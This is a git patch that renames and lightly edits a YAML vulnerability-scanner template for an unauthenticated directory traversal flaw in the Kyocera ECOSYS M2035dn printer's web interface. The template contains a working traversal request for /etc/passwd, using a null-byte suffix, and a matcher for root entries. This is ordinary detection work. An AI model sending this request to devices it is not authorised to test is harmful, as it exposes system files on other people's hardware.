From 1f1b03ba67d341cbb6e14fb8641b8f32099bb03b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 15 Feb 2022 02:10:30 +0530 Subject: [PATCH] Update and rename kyocera-rx-ecosys-m2035dn-lfi.yaml to vulnerabilities/other/kyocera-m2035dn-lfi.yaml --- .../other/kyocera-m2035dn-lfi.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) rename kyocera-rx-ecosys-m2035dn-lfi.yaml => vulnerabilities/other/kyocera-m2035dn-lfi.yaml (93%) diff --git a/kyocera-rx-ecosys-m2035dn-lfi.yaml b/vulnerabilities/other/kyocera-m2035dn-lfi.yaml similarity index 93% rename from kyocera-rx-ecosys-m2035dn-lfi.yaml rename to vulnerabilities/other/kyocera-m2035dn-lfi.yaml index 5f673cb32c..f0587dca70 100644 --- a/kyocera-rx-ecosys-m2035dn-lfi.yaml +++ b/vulnerabilities/other/kyocera-m2035dn-lfi.yaml @@ -1,4 +1,4 @@ -id: kyocera-rx-ecosys-m2035dn-lfi +id: kyocera-m2035dn-lfi info: name: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) @@ -9,15 +9,14 @@ info: - https://www.exploit-db.com/exploits/50738 - https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html tags: printer,iot,kyocera,lfi - - requests: + +requests: - method: GET path: - "{{BaseURL}}/js/../../../../../../../../etc/passwd%00.jpg" matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0"